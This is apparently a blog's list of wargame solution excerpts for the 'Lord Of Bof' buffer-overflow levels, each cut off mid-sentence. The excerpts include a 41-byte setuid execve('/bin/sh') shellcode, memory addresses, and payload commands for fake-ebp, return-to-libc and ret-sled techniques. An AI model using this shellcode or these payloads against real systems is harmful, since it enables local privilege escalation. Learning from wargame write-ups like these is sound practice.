목록Wargames/Lord Of Bof (4)
Solutions Level 1 - off-by-one %ecx register overflow ; first we know about environment of Fedora 5 ; prologue and epilogue is changed ; by ecx register, it works as stack guard and stack shield ; normally we can't control ret address directly , but for controlling ret address, we need to know ecx(ret+4) ; but it's extremely difficult to guess %ecx register because of ALSR ; SO we need to use of..
Solutions Level 1 - up-upgraded simple buffer overflow ; no more fake ebp ; random library ; like FC3 level1 prob, use ret to ret for escaping random stack ; when using 12 ret, execve's argv of 2 is null ; ret address : 0x08048451 ; execve address : 0x00832abc ; for file name : 85 c0 75 53 65 a1 54 ; payload : ln -s ./shell $(echo -en "\x85\xc0\x75\x53\x65\xa1\x54") ./cruel $(python -c 'print "A..
Solutions Level 1 - upgraded simple buffer overflow ; because of Operation System, there are some limits like random stack, ASLR, Ascii Armor, etc memory protection ; so we'd like to use RTL or ROP attack rather than using shellcode ; hint is fake ebp, and i'll use fake ebp + rtl ; and use execve instead of system ; because internal routine of system function, it re-sets geteuid value ; we need ..
Solutions Level 1 - Simple Buffer Overflow ; buffer | ebp | ret ; ; need to run with bash2 because of \x00 and \xff ; shellcode : \x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 // 41 bytes ; buffer addr : \x18\xf9\xff\xbf ; payload : ./gremlin $(python -c 'print "A"*20..